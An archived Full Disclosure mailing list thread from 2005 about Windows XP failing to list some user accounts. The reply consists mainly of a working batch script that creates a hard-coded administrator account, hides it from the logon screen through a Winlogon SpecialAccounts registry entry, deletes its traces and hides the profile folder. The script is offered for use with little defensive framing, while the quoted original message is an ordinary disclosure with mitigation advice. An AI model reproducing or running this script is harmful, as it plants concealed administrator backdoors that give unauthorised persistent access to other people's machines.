Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: hidden users on windows?

From: Ill will <xillwillx () gmail com>
Date: Thu, 4 Aug 2005 09:16:55 -0400
old news for XP
  
@echo off

@echo HideUserXP.bat

@echo by illwill http://illmob.org

@echo This will create a hidden user with admin rights in XP

@echo ( hidden meaning that the username wont appear in the logon screen)

@echo To log on to your hidden account, you need to use the Log On To 
Windows dialog box by pressing Ctrl + Alt + Delete twice.

@echo Make sure you're logged off all accounts. You can't just switch users.

 net user illwill password /add && net localgroup administrators illwill 
/add

echo Windows Registry Editor Version 5.00> c:\hide.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg

echo "illwill"=dword:00000000>> c:\hide.reg

REGEDIT /S c:\hide.REG

DEL /Q c:\hide.REG

attrib +r +a +s +h %SystemDrive%\docume~1\illwill

Exit


 On 8/3/05, nabiy <nathan.aguirre () gmail com> wrote: 


Hello,

A security issue has been identified in current versions of windows
that allows 'hidden' user accounts. The User Account Manager in the
Windows Control Panel and the 'Welcome Screen' both fail to report
interactive logons made with the netapi. This security issue has been
verified on Windows 2000 Professional, Windows XP Home Edition and
Windows XP Professional. Microsoft was notified of this issue on July
28, 2005. The problem is not with the netapi or the ability to create
users but with the User Account Manager in Windows. It simply fails to
list all of the users that are on the system.

This issue was noticed while exploring the netapi on windows – users
created with the netuseradd function failed to show up in both the
User Account Manager and on the Welcome Screen. The failure to list
users made with the netapi presents a problem for obvious reasons;
home users and even administrators expect to see all of the users on
their system when using these facilities.

The solution in all versions of windows is simple. Do not depend on
the User Account Manager when managing user accounts on your system.
Instead, users should use the Local Users and Groups management snapin
or the net command from the cli.

More information has been documented at http://neworder.box.sk

nathan aguirre
--
http://nabiy.sdf1.org . gopher://sdf.lonestar.org/11/users/nabiy
The Super Dimension Fortress Public Access Unix System

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





-- 
- illwill
http://illmob.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: